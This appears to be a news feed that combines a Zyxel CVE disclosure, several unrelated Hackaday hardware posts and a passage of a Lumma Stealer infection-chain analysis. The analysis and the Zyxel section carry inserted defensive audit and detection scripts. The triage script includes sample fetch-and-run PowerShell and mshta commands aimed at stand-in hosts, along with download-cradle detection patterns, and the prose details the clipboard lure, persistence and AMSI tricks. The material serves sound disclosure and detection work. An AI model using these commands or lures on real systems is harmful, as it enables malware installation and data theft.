
HackerHood from RHC Reveals Two New 0-days in Zyxel Products


The cybersecurity research collective HackerHood, part of the Red Hot Cyber community, has recently discovered two new vulnerabilities in Zyxel devices, once again demonstrating the importance of proactive research in countering undocumented cyber threats (so-called zero-days).

Both bugs, tracked as CVE-2025-1731 and CVE-2025-1732, were credited to bug researcher Alessandro Sgreccia, while CVE-2025-1732 also carries the signature of another bug researcher, Marco Ivaldi. The vulnerabilities were isolated and promptly reported to Zyxel’s PSIRT.

CVE-2025-1731: Remote Code Execution on Zyxel USG FLEX H Series


During research into undocumented vulnerabilities in Zyxel devices, a security issue was identified involving a third-party application (PostgreSQL). Although no vulnerabilities were found in the PostgreSQL version itself, a misconfiguration allows an attacker to establish an SSH tunnel with port forwarding, exposing the database service (port 5432) to external access.

Normally, the PostgreSQL instance is reachable only via localhost, which limits its exposure. However, by using SSH tunneling, an attacker can create a direct communication channel to the database from a remote system. The risk is further aggravated by the absence of authentication requirements for database access, which allows an attacker to run arbitrary queries and obtain remote code execution (RCE) by spawning a reverse shell as the postgres user.
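The weakness described above is a combination of two settings: a database that trusts whoever reaches the loopback interface, and an SSH service that lets a user forward ports to that interface. The following Python script is an added example, not part of the original article and not Zyxel’s actual configuration (which the article does not show): it audits pg_hba.conf rules and assumes the missing authentication takes the form of trust entries. It flags them even when they are restricted to 127.0.0.1 or ::1, because a loopback-only rule is no longer a boundary once SSH port forwarding is available. The two configurations in the script are constructed for illustration.

```python
"""Added example: audit pg_hba.conf rules for authentication-free database access.
The configurations below are constructed; they are not Zyxel's PostgreSQL settings."""

HOST_TYPES = {"host", "hostssl", "hostnossl", "hostgssenc", "hostnogssenc"}
WEAK_METHODS = {
    "trust": "no authentication at all",
    "password": "a cleartext password on the wire",
}
LOOPBACK = {"127.0.0.1/32", "::1/128"}

# Constructed: loopback-only rules with no authentication. They look harmless until
# an SSH port forward lets a remote client reach 127.0.0.1:5432 on the appliance.
WEAK_PG_HBA = """\
# TYPE  DATABASE  USER  ADDRESS        METHOD
local   all       all                  trust
host    all       all   127.0.0.1/32   trust
host    all       all   ::1/128        trust
host    all       all   10.0.0.0/8     scram-sha-256
"""

# Constructed hardened version: every path into the database requires credentials.
HARDENED_PG_HBA = """\
# TYPE  DATABASE  USER  ADDRESS        METHOD
local   all       all                  scram-sha-256
host    all       all   127.0.0.1/32   scram-sha-256
host    all       all   ::1/128        scram-sha-256
host    all       all   10.0.0.0/8     scram-sha-256
"""


def parse_pg_hba(text):
    """Yield (line_no, rule) for each non-comment rule. Handles the common
    'local' and 'host*' forms with CIDR addresses; the old IP+netmask form is skipped."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        kind = fields[0]
        if kind == "local" and len(fields) >= 4:
            yield line_no, {"type": kind, "address": None, "method": fields[3]}
        elif kind in HOST_TYPES and len(fields) >= 5 and "/" in fields[3]:
            yield line_no, {"type": kind, "address": fields[3], "method": fields[4]}


def audit_pg_hba(text):
    """Return (line_no, message) for every rule that grants access without real authentication."""
    findings = []
    for line_no, rule in parse_pg_hba(text):
        method = rule["method"]
        if method not in WEAK_METHODS:
            continue
        scope = rule["address"] or "local socket"
        note = WEAK_METHODS[method]
        if rule["address"] in LOOPBACK:
            note += "; loopback scope is not a boundary once SSH port forwarding is possible"
        findings.append((line_no, f"{rule['type']} {scope}: method '{method}' gives {note}"))
    return findings


if __name__ == "__main__":
    for line_no, message in audit_pg_hba(WEAK_PG_HBA):
        print(f"line {line_no}: {message}")
    print("hardened config findings:", audit_pg_hba(HARDENED_PG_HBA))
```

The complementary control lives on the SSH side: for accounts that have no business opening tunnels, sshd_config supports AllowTcpForwarding no (or a restrictive PermitOpen), so that even a trust rule on loopback cannot be reached from a remote host.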

The Zyxel USG FLEX H Series is a line of high-performance firewalls designed for demanding, high-speed networks. It offers faster boot times and better CPU performance than the standard USG FLEX series.

CVE-2025-1732: Privilege Escalation


This vulnerability concerns privilege escalation through misuse of the SetUID bit on a custom binary. An unprivileged user can obtain root access by executing a statically compiled shell with SetUID enabled, which was previously packaged in a ZIP archive, transferred via the uOS RMA recovery function and extracted as root on a vulnerable system.

In particular, the shell executable explicitly sets its UID and GID to 0 to elevate privileges, and it is statically compiled to avoid dependency issues that could prevent execution. Impact of the vulnerability:

  • Privilege escalation → The attacker can obtain a root shell.
  • Persistence → The attacker can create a backdoor for future access.
  • Full system compromise → The attacker can modify critical system files.


HackerHood’s role in the discovery


HackerHood, with 19 CVEs issued in two years of activity, is Red Hot Cyber’s collective of ethical hackers dedicated to researching undocumented vulnerabilities in order to make cybersecurity more robust. The group is built on a manifesto that promotes knowledge sharing and the improvement of collective security, identifying and reporting critical vulnerabilities to protect users and businesses.

According to the HackerHood manifesto, the collective values ethics in cybersecurity and encourages collaboration among professionals in the field. This case demonstrates the importance of their mission: putting the skills of ethical hackers at the service of the global community to identify as-yet unknown threats.

Join HackerHood


If you are a bug hunter or security researcher and want to contribute to initiatives of this kind, HackerHood is always open to new talent. The collective welcomes experts motivated to work on concrete projects to improve global cybersecurity. Send an email with your experience and skills to info@hackerhood.it to join this team of professionals.

The discovery of CVE-2024-12398 is a further example of HackerHood’s significant contribution to the cybersecurity landscape. It is essential that companies and end users pay attention to such discoveries and adopt the measures needed to prevent exploitation. Collaboration among ethical hackers, companies and the community remains a cornerstone in the fight against cyber threats.

Disclosure Timeline

  • 2025-02-11: ZYXEL was notified via security@zyxel.com.tw.
  • 2025-02-12: ZYXEL acknowledged receipt of my vulnerability report.
  • 2025-02-20: ZYXEL’s Product team was unable to use the stolen ‘authtok’ to create an admin account and could not reproduce the issue. I provided them with a code modification to improve the exploit.
  • 2025-02-25: ZYXEL’s Product team was still unable to reproduce the issue, so I requested access to the device for further investigation.
  • 2025-02-25: ZYXEL PSIRT informed me that the RD Team Leader would contact me to grant access to their device.
  • 2025-02-26: ZYXEL’s RD Team notified me that they were finally able to reproduce the issue.
  • 2025-03-06: ZYXEL assigned CVE-2025-1731 and CVE-2025-1732 to the reported issues and informed me of their intention to publish their security advisory on 2025-04-15.
  • 2025-04-08: ZYXEL requested to postpone the public disclosure date to April 22, 2025, as the firmware patch is scheduled for release on April 14, 2025, allowing users adequate time to apply the update and secure their systems before the vulnerability is disclosed.
  • 2025-04-22: ZYXEL published their security advisory, following my coordinated disclosure timeline.

The article “HackerHood from RHC Reveals Two New 0-days in Zyxel Products” comes from il blog della sicurezza informatica.


Making Your Own Light Bulb Using a Jar, a Pencil, and Two Bolts


Start with a jar, install the bolts, install the filament, and power on.

This Short from [ProShorts 101] shows us how to make an incandescent light bulb from a jar, a pencil lead, two bolts, and a candle.

Prepare the lid of the jar by melting in two holes to hold the bolts. You can do this with your soldering iron, but make sure your workspace is well ventilated and don’t breathe the fumes. Install the two bolts into the lid. Take a pencil lead and secure it between the two bolts. Chop off the tip of a candle and glue it inside the lid. Light the candle and, while it’s burning, cover it with the jar and screw on the lid. Apply power and your light bulb will glow.

The incandescent light bulb was invented by Thomas Edison and patented in patent US223898 in 1879. It’s important to remove the oxygen from the bulb so that the filament doesn’t burn up when it gets hot. That’s what the candle is for, to burn out all the oxygen in the jar before it’s sealed.

Of course if you want something that is energy efficient you’re going to want an LED light bulb.

youtube.com/embed/_ItOFyOTb8M?…


hackaday.com/2025/04/21/making…


PoX: Super-Fast Graphene-Based Flash Memory


Recently a team at Fudan University claimed to have developed a picosecond-level Flash memory device (called ‘PoX’) that has an access time of a mere 400 picoseconds. This is significantly faster than the millisecond level access times of NAND Flash memory, and more in the ballpark of DRAM, while still being non-volatile. Details on the device technology were published in Nature.

In the paper by [Yutong Xing] et al. they describe the memory device as using a two-dimensional Dirac graphene-channel Flash memory structure, with hot carrier injection for both electron and hole injection, meaning that it is capable of both writing and erasing. Dirac graphene refers to the unusual electron transport properties of typical monolayer graphene sheets.

Demonstrated was a write speed of 400 picoseconds, non-volatile storage and a 5.5 × 10^6 cycle endurance with a programming voltage of 5 V. It is the unique properties of a Dirac material like graphene that allow these writes to occur significantly faster than in a typical silicon transistor device.

What is still unknown is how well this technology scales, its power usage, durability and manufacturability.


hackaday.com/2025/04/21/pox-su…


Jolly Wrencher Down to the Micron


RepRap was the origin of pushing hobby 3D printing boundaries, and here we see a RepRap scaled down to the smallest detail. [Vik Olliver] over at the RepRap blog has been working on getting a printer to print down to micron accuracy.

Triangular Pattern through a microscope

The printer is constructed using 3D-printed flexures similar to those of the OpenFlexure microscope. Two flexures provide the tiny XYZ movements needed for micron-level printing. While still at the stage of printing simple objects, the microscopic scale of printing is incredible. [Vik] managed to print a triangular pattern in resin at a total size of 300 µm. For comparison, SLA 3D printers struggle at many times that scale. Other interesting possibilities for this technology include printing small-scale circuits from conductive resins, though this might require some customization in the resin department.

In addition to printing with resin, µRepRap can be seen making designs in marker ink, such as our own Jolly Wrencher! At only 1.5 mm, the detail is impressive, especially when considering the nature of scratching away ink.

RepRap micron printer during print

If you want to make your own µRepRap, head over to [Vik Olliver]’s GitHub. The µRepRap project has been a long-running one, and the design has changed quite a bit since it started. Check out an older version of the µRepRap project based around OpenFlexure!


hackaday.com/2025/04/21/jolly-…


Trekulator: A Reproduction of the 1977 Star Trek Themed Calculator


A recent project over on Hackaday.io from [Michael Gardi] is Trekulator – Where No Maker Has Gone Before.

This is a fun build and [Michael] has done a very good job of emulating the original device. [Michael] used the Hackaday.io logging feature to log his progress. Starting in September 2024 he modeled the case, got his original hardware working, got the 7-segment display working, added support for sound, got the keypad working and mounted it, added the TFT display and mounted it, wired up the breadboard implementation, designed and implemented the PCBs, added some finishing touches, installed improved keys, and added a power socket back in March.

It is perhaps funny that where the original device used four red LEDs, [Michael] has used an entire TFT display. This would have been pure decadence by the standards of 1977. The software for the ESP32 microcontroller was fairly involved. It had to support audio, graphics, animations, keyboard input, the 7-segment display, and the actual calculations.

The calculations are done using double-precision floating-point values and eight positions on the display, so this code will do weird things in some edge cases. For instance, if you ask it to sum two eight-digit numbers such as 90,000,000 and 80,000,000, which would ordinarily sum to the nine-digit value 170,000,000, the display will show you a different value instead, such as maybe 17,000,000 or 70,000,000. Why don’t you put one together and let us know what it actually does! Also, can you find any floating-point precision bugs?

This was a really fun project, thanks to [Michael] for writing it up and letting us know via the tips line!

youtube.com/embed/DtQb22XuGGM?…

youtube.com/embed/IBBv7u4kOjA?…


hackaday.com/2025/04/21/trekul…


Remembering UCSD p-System, the Pascal Virtual Machine


Long before the Java Virtual Machine (JVM) was said to take the world by storm, the p-System (pseudo-system, or virtual machine) developed at the University of California, San Diego (UCSD) provided a cross-platform environment for UCSD’s Pascal dialect. Later on, additional languages would also be made available for the UCSD p-System, such as Fortran (by Apple Computer) and Ada (by TeleSoft), not unlike the various languages targeting the JVM today in addition to Java. The p-System could be run on an existing OS or as its own OS directly on the hardware. This was extremely attractive in the fragmented home computer market of the 1980s.

After the final release of version IV of UCSD p-System (IV.2.2 R1.1) in 1987, the software died a slow death, but this doesn’t mean it is forgotten. People like [Hans Otten] have documented the history and technical details of the UCSD p-System, and the UCSD Pascal dialect went on to inspire Borland Pascal.

Recently [Mark Bessey] also reminisced about using the p-System in High School with computer programming classes back in 1986. This inspired him to look at re-experiencing Apple Pascal as well as UCSD Pascal on the UCSD p-System, possibly writing a p-System machine. Even if it’s just for nostalgia’s sake, it’s pretty cool to tinker with what is effectively the Java Virtual Machine or Common Language Runtime of the 1970s, decades before either of those were a twinkle in a software developer’s eyes.

Another common virtual runtime of the era was CHIP-8. It is also gone, but not quite forgotten.


hackaday.com/2025/04/21/rememb…


Keebin’ with Kristina: the One with the Part Picker


Illustrated Kristina with an IBM Model M keyboard floating between her hands.

If you do a lot of 3D computer work, I hear a Spacemouse is indispensable. So why not build a keyboard around it and make it a mouse-cropad?

A Spacemouse with an arcing keyboard built around it. Image by [DethKlawMiniatures] via reddit

That’s exactly what [DethKlawMiniatures] did with theirs. This baby is built with mild steel for the frame, along with some 3D-printed spacers and a pocket for the Spacemouse itself to live in.

Those switches are Kailh speed coppers, and they’re all wired up to a Seeed Xiao RP2040. [DethKlawMiniatures] says that making that lovely PCB by hand was a huge hassle, but impatience took over.

After a bit of use, [DethKlawMiniatures] says that the radial curve of the macro pad is nice, and the learning curve was okay. I think this baby looks fantastic, and I hope [DethKlawMiniatures] gets a lot of productivity out of it.

Kinesis Rides Again After 15 Years


Fifteen years ago, [mrmarbury] did a lot of ergo keyboard research and longed for a DataHand II. Once the sticker shock wore off, he settled on a Kinesis Advantage with MX browns just like your girl is typing on right now.

The inside of a Kinesis Advantage with new switches and a Stapelberg controller. Image by [mrmarbury] via reddit

Not only did [mrmarbury] love the Kinesis to death, he learned Dvorak on it and can do 140 WPM today. And, much like my own experience, the Kinesis basically saved his career.

Anyway, things were going gangbusters for over a decade until [mrmarbury] spilled coffee on the thing. The main board shorted out, as did a thumb cluster trace. He did the Stapelberg mod to replace the main board, but that only lasted a little while until one of the key-wells’ flex boards came up defective. Yadda yadda yadda, he moved on and eventually got a Svalboard, which is pretty darn close to having a DataHand II.

But then a couple of months ago, the Kinesis fell on [mrmarbury]’s head while cleaning out a closet and he knew he had to fix it once and for all. He ripped out the flex boards and hand-wired it up to work with the Stapelberg mod. While the thumb clusters still have their browns and boards intact, the rest were replaced with Akko V3 Creme Blue Pros, which sound like they’re probably pretty amazing to type on. So far, so good, and it has quickly become [mrmarbury]’s favorite keyboard again. I can’t say I’m too surprised!

The Centerfold: Swingin’ Bachelor Pad


A nicely lit setup in front of a small window, with a large plant in the corner. Image by [weetek] via reddit

Isn’t this whole thing just nice? Yeah it is. I really like the lighting and the monster monstera. The register is cool, and I like the way the panels on the left wall mimic its lines. And apparently that is a good Herman Miller chair, and I dig all the weird plastic on the back, but I can’t help but think this setup would look even cleaner with an Aeron there instead. (Worth every penny!)

Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!

Historical Clackers: the IBM Selectric Composer


And what do we have here? This beauty is not a typewriter, exactly. It’s a typesetter. What this means is that, if used as directed, this machine can churn out text that looks like it was typeset on a printing press. You know, with the right margin justified.

The IBM Selectric Composer, which looks like a Selectric, but has a dial on both sides of the keyboard. Image by [saxifrageous] via reddit

You may be wondering how this is achieved at all. It has to do with messing with the kerning of the type — that’s the space between each letter. The dial on the left sets the language of the type element, while the one on the right changes the spacing. There’s a lever around back that lets you change the pitch, or size of the type. The best part? It’s completely mechanical.

To actually use the thing, you had to type your text twice. The first time, the machine measured the length of the line automatically and then reported a color and number combination (like red-5), which was to be noted in the right margin.

The IBM Selectric Composer came out in 1966 and was a particularly expensive machine. Like, $35,000 in 2025 money expensive. IBM typically rented them out to companies and then trashed them when they came back, which, if you’re younger than a certain vintage, is why you’ve probably never seen one before.

If you just want to hear one clack, check out the short video below of a 1972 Selectric Composer where you can get a closer look at the dials. In 1975, the first Electronic Selectric Composer came out. I can’t even imagine how much those must have cost.

youtube.com/embed/Ba92fcE0bkI?…

Finally, a Keyboard Part Picker


Can’t decide what kind of keyboard to build? Not even sure what all there is to consider? Then you can’t go wrong with Curatle, a keyboard part picker built by [Careless-Pay9337] to help separate you from your hard-earned money in itemized fashion.

The welcoming emptiness of a keyboard part picker waiting for input. The start screen for Curatle made by [Careless-Pay9337].

So this is basically PCPartPicker, but for keyboards, and those are [Careless-Pay9337]’s words. Essentially, [Careless-Pay9337] scraped a boatload of keyboard products from various vendors, so there is a lot to choose from already. But if that’s not enough, you can also import products from any store.

The only trouble is that currently, there’s no compatibility checking built in. It’ll be a long road, but it’s something that [Careless-Pay9337] does plan to implement in the future.

What else would you like to see? Be sure to let [Careless-Pay9337] know over in the reddit thread.


Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.


hackaday.com/2025/04/21/keebin…


Restoration of Six-Player Arcade Game From the Early 90s


Although the video game crash of the mid-80s caused a major decline in arcades from their peak popularity, the industry didn’t completely die off. In fact, there was a revival that lasted until the 90s, with plenty of companies like Capcom, Midway, SEGA, and Konami all competing to get quarters, francs, loonies, yen, and other coins from around the world. During this time, Namco — another game company — built a colossal 28-player prototype shooter game. Eventually, they cut it down to a (still titanic) six-player game that was actually released to the world. [PhilWIP] and his associates are currently restoring one of the few room-sized games that still survive.

The game is called Galaxian 3, with this particular one having been upgraded to a version called “Attack of the Zolgear”. Even though it’s “only” a six-person shooter, it’s still enormous in scale. The six players sit side-by-side in an enclosed room, each with their own controller. Two projectors handle the display, which is large even by modern standards, and a gauntlet of early-90s technology, including LaserDisc players, is responsible for all of the gameplay. When [PhilWIP] first arrived, the game actually powered on, but there were several problems to solve before it was playable. They also wanted to preserve the game, which meant imaging the LaserDiscs to copy their data onto modern storage. Some of the player input PCBs needed repairs, and there were several issues with the projectors. Eventually the team got the system working well enough to play.

[PhilWIP] and the others haven’t gotten all the issues ironed out yet. The hope is that subsequent trips will restore this 90s novelty to working order shortly. It turns out there was all kinds of unique hardware from this wild-west era in need of restoration, as we saw a few years ago with this early 3D cabinet from the same era.


hackaday.com/2025/04/21/restor…


Lumma Stealer – Tracking distribution channels



Introduction


The evolution of Malware-as-a-Service (MaaS) has significantly lowered the barriers to entry for cybercriminals, with information stealers becoming one of the most commercially successful categories in this underground economy. Among these threats, Lumma Stealer has emerged as a particularly sophisticated player since its introduction in 2022 by the threat actor known as Lumma. Initially marketed as LummaC2, this information stealer quickly gained traction in underground forums, with prices starting at $250. As of March 2025, its presence on dark web marketplaces and Telegram channels continues to grow, with over a thousand active subscribers.

LummaC2 seller’s official website

Lumma delivery usually involves human interaction, such as clicking a link, running malicious commands, etc. Recently, while investigating an incident as part of our incident response services, our Global Emergency Response Team (GERT) encountered Lumma on a customer’s system. The analysis revealed that the incident was triggered by human interaction, namely the user was tricked into executing a malicious command by a fake CAPTCHA page. In this article, we will review in detail how the fake CAPTCHA campaign works and share a list of IoCs that we discovered during our analysis and investigation of the campaign. Although we already described this distribution method in an earlier article, more details about this campaign have been discovered since then.

Lumma Stealer’s distribution vectors


Lumma Stealer’s distribution methods are diverse, using common techniques typically seen in information-stealing malware campaigns. Primary infection vectors include phishing emails with malicious attachments or links, as well as trojanized legitimate applications. These deceptive tactics trick users into executing the malware, which runs silently in the background harvesting valuable data. Lumma has also been observed using exploit kits, social engineering, and compromised websites to extend its reach and evade detection by security solutions. In this article, we’ll focus mainly on the fake CAPTCHA distribution vector.

This vector involves fake verification pages that resemble legitimate services, often hosted on platforms that use Content Delivery Networks (CDNs). These pages typically masquerade as frequently used CAPTCHAs, such as Google reCAPTCHA or Cloudflare CAPTCHA, to trick users into believing they are interacting with a trusted service.

Fake CAPTCHA distribution vectors


Fake CAPTCHA distribution scheme

There are two types of resources used to promote fake CAPTCHA pages:

  • Pirated media, adult content, and cracked software sites. The attackers clone these websites and inject malicious advertisements into the cloned page that redirect users to a malicious CAPTCHA.
  • Fake Telegram channels for pirated content and cryptocurrencies. The attackers create Telegram channels with names containing keywords related to cryptocurrencies or pirated content, such as software, movies, etc. When a user searches for such content, the fraudulent channels appear at the top of the search. The attackers also use social media posts to lure victims to these channels. When a user joins such a channel, they are prompted to complete an identity verification via a fraudulent “Safeguard Captcha” bot.
    Safeguard Captcha bot

    Once the user clicks the Verify button, the bot opens a pop-up page with a fake CAPTCHA.


Fake CAPTCHA page


Users are presented with a pop-up page that looks like a standard CAPTCHA verification, prompting them to click I’m not a robot/Verify/Copy or some similar button. However, this is where the deception begins.

Fake CAPTCHA page examples

Fake page malicious content


When the I’m not a robot/Verify/Copy button is clicked, the user is instructed to perform an unusual sequence:

  • Open the Run dialog (Win+R)
  • Press Ctrl+V
  • Hit Enter

Without the user’s knowledge, clicking the button automatically copies a PowerShell command to the clipboard. Once the user pastes the command into the Run dialog and presses Enter, the system executes the command.

Examples of scripts copied to the clipboard and executed via the Run dialog

The command may vary slightly from site to site and changes every few days, but it is typically used to download Lumma Stealer from a remote server, which is usually a known CDN with a free trial period or a legitimate code hosting and collaboration platform such as GitHub, and begin the malware installation process. Let’s take a closer look at this infection chain using the following command that was executed in our customer’s incident as an example:

Command triggering Lumma’s infection chain

The command is rather simple. It decodes and runs the contents from the remote win15.txt file hosted at https[:]//win15.b-cdn[.]net/win15.txt. The win15.txt file contains a Base64-encoded PowerShell script that then downloads and runs the Lumma Stealer. When decoded, the malicious PowerShell script looks like this:

Contents of win15.txt

The script performs the following actions:

  1. Downloads the malware. It downloads the win15.zip file from https[:]//win15.b-cdn[.]net/win15.zip to [User Profile]\AppData\Roaming\bFylC6zX.zip.
  2. Extracts the malware. The downloaded ZIP file is extracted to C:\Users\[User]\AppData\Roaming\7oCDTWYu, a hidden folder under the user’s AppData directory.
  3. Executes the malware. The script runs the Set-up.exe file from the unpacked archive, which is now located at C:\Users\[User]\AppData\Roaming\7oCDTWYu\Set-up.exe.
  4. Establishes a persistence mechanism. The script creates an entry in the Windows Registry for persistence, ensuring that the malware runs every time the system starts. The registry key is added under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. The key name is 5TQjtTuo, with the value pointing to Set-up.exe.
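The persistence step leaves two traits a defender can look for without knowing the specific sample: an autorun value whose executable lives in a user-writable directory such as AppData\Roaming, and machine-generated names like 5TQjtTuo and 7oCDTWYu. The Python script below is an added example, not code from the article or from the malware; it audits a set of Run-key entries supplied as name-to-command pairs. The entries are constructed, and the random-name check is a heuristic of our own rather than anything the campaign documents. On a live Windows host the entries could be read with winreg, which is deliberately left out so the script runs anywhere.

```python
import re

# Directories a standard user can write to; an autorun pointing here deserves review.
USER_WRITABLE_MARKERS = (
    "\\appdata\\roaming\\",
    "\\appdata\\local\\temp\\",
    "\\users\\public\\",
    "\\downloads\\",
)
VOWELS = set("aeiou")

# Constructed entries shaped like HKCU\...\CurrentVersion\Run values.
# The second one mirrors the persistence step described in the article.
SAMPLE_RUN_ENTRIES = {
    "OneDrive": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "5TQjtTuo": r"C:\Users\alice\AppData\Roaming\7oCDTWYu\Set-up.exe",
    "SecurityHealth": r"C:\Windows\system32\SecurityHealthSystray.exe",
}


def looks_random(token: str) -> bool:
    """Heuristic for machine-generated names (5TQjtTuo, 7oCDTWYu): an alphanumeric
    token mixing digits with upper and lower case and carrying few vowels, or one
    with almost no vowels at all. Product names such as OneDrive do not match."""
    if len(token) < 6 or not token.isalnum():
        return False
    letters = [c for c in token if c.isalpha()]
    if not letters:
        return False
    vowel_ratio = sum(c.lower() in VOWELS for c in letters) / len(letters)
    has_digit = any(c.isdigit() for c in token)
    mixed_case = any(c.isupper() for c in letters) and any(c.islower() for c in letters)
    return (has_digit and mixed_case and vowel_ratio < 0.35) or vowel_ratio < 0.15


def audit_run_entries(entries: dict) -> list:
    """Return {name, value, reasons} for every entry that deserves a closer look."""
    findings = []
    for name, value in entries.items():
        reasons = []
        lowered = value.lower()
        if any(marker in lowered for marker in USER_WRITABLE_MARKERS):
            reasons.append("executable lives in a user-writable directory")
        if looks_random(name):
            reasons.append("value name looks machine-generated")
        # Check each directory on the path, not the executable name itself.
        parts = [p for p in re.split(r"[\\/]", value.strip('"')) if p]
        if any(looks_random(p) for p in parts[:-1]):
            reasons.append("path contains a machine-generated directory name")
        if re.search(r"powershell|mshta|wscript|cscript|\s-e(nc|ncodedcommand)?\s", lowered):
            reasons.append("script interpreter launched at logon")
        if reasons:
            findings.append({"name": name, "value": value, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_run_entries(SAMPLE_RUN_ENTRIES):
        print(finding["name"], "->", finding["value"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The output is a triage signal, not a verdict: some legitimate vendors use terse autorun names, so each hit still needs the executable checked (signature, hash, creation time) before acting on it.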

However, in some cases, the malware delivery mechanism can be more complex. In the following example, the delivery script is JavaScript code hidden in what looks like an .mp3 file (other file formats such as .mp4 and .png have also been used). In fact, in addition to the JavaScript, the file may contain a corrupt .mp3/.mp4 file, legitimate software code, or just random data.

The script is executed using the Microsoft HTML Application engine mshta.exe by prompting the user to paste the following command into the Run dialog box:

Command triggering JS-based infection chain
Command triggering JS-based infection chain

The mshta command parses the file as an HTA file (Microsoft HTML Application) and executes any JavaScript code within the <script> tag, triggering the following infection chain:

Layer (1)

The JS script inside the .mp3 file is executed by mshta.

JS script within the never.mp3 file

Layer (2)

After calculating the Kwb value, the following script is obtained, which is then executed by the eval function.

Layer (2) JS script

Layer (3)

After calculating the values for kXN and zzI, the final ActiveX command is built and executed. It contains an encoded PowerShell script in the $PBwR variable.

Deobfuscated Layer (2) JS script

Layer (4)

After decoding the PowerShell script, we found that its main purpose is to download and execute another PowerShell file from the C2 path hXXps://connect[.]klipfuzj[.]shop/firefire[.]png.

Decrypted Layer (3) PowerShell script
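Both entry points described so far, the PowerShell one-liner pasted into the Run dialog and the mshta variant that fetches a fake media file, share a shape that shows up in process-creation telemetry: a script interpreter started by explorer.exe with a command line that downloads and runs remote content. The Python triage routine below is an added example, not part of the Kaspersky analysis or of any product; it runs over constructed records shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine). The hostnames use the reserved .invalid domain and are not indicators from the campaign. It goes slightly beyond the two commands on the page by also catching the -EncodedCommand form and the classic download cradles.

```python
import re
from urllib.parse import urlparse

# Interpreters the fake-CAPTCHA lure drives through the Run dialog.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line fragments that fetch and run remote code (matched against the lowercased line).
CRADLE_PATTERNS = (
    r"\biex\b", r"invoke-expression", r"\birm\b", r"invoke-restmethod",
    r"\biwr\b", r"invoke-webrequest", r"downloadstring", r"downloadfile",
    r"frombase64string", r"\s-e(c|nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}",
)

# Constructed process-creation records; none of these hosts or files are real indicators.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://cdn.example.invalid/win15.txt)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://media.example.invalid/never.mp3"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Users\alice\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(event: dict) -> list:
    """Return the reasons this process-creation event deserves attention (empty if none)."""
    image = image_name(event["Image"])
    if image not in INTERPRETERS:
        return []
    command = event["CommandLine"]
    lowered = command.lower()
    reasons = []
    if any(re.search(pattern, lowered) for pattern in CRADLE_PATTERNS):
        reasons.append("download-and-execute cradle in command line")
    urls = re.findall(r"https?://[^\s'\"]+", command, flags=re.IGNORECASE)
    if image == "mshta.exe" and urls:
        # mshta is meant for .hta files; a remote .mp3/.mp4/.png is the pattern seen here.
        path = urlparse(urls[0]).path
        ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
        if ext != "hta":
            reasons.append(f"mshta fetching remote content with a .{ext} extension")
    if reasons and image_name(event["ParentImage"]) == "explorer.exe":
        reasons.append("spawned by explorer.exe, consistent with the Run dialog")
    return reasons


def triage(events: list) -> list:
    """Return (index, reasons) for every suspicious event, in input order."""
    flagged = []
    for index, event in enumerate(events):
        reasons = triage_event(event)
        if reasons:
            flagged.append((index, reasons))
    return flagged


if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_EVENTS):
        print(f"event {index}: {SAMPLE_EVENTS[index]['CommandLine']}")
        for reason in reasons:
            print("   -", reason)
```

The third record, a scheduled backup script started from the shell, is left alone on purpose: parentage alone is too noisy, so the explorer.exe parent only strengthens a hit that a cradle or an odd mshta target has already produced.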

Analysis for firefire.png


The file firefire.png is a huge PowerShell file (~31MB) with several layers of obfuscation and anti-debugging. After deobfuscating and removing unnecessary code, we could see that the main purpose of the file is to generate and execute an encrypted PowerShell script as follows:

firefire.png

The decryption key is the output of the Invoke-Metasploit command, which AMSI blocks when it is enabled. The resulting AMSI error message, AMSI_RESULT_NOT_DETECTED, is what the script uses as the key. If AMSI is disabled, the command is not blocked, no such message is produced, and the malware fails to decrypt the script.

The decrypted PowerShell script is approximately 1.5MB in size and its main purpose is to create and run a malicious executable file.

Decrypted PowerShell script

Infection methods and techniques


Lumma Stealer has been observed in the wild using a variety of infection methods, with two primary techniques standing out in its distribution campaigns: DLL sideloading and injection of a malicious payload into the overlay section of legitimate free software. These techniques are particularly effective at evading detection because they exploit the trust that users place in widely used applications and system processes.

  • DLL sideloading
    DLL sideloading is a well-known technique where malicious dynamic link libraries (DLLs) are loaded by a legitimate application. This technique exploits vulnerabilities or misconfigurations in software that inadvertently load DLL files from untrusted directories. Attackers can drop the Lumma Stealer DLL in the same directory as a trusted application, causing it to load when the application is executed. Because the malicious DLL is loaded in the context of a trusted process, it is much harder for traditional security measures to detect the intrusion.
  • Injection of malicious payload into the overlay section of software
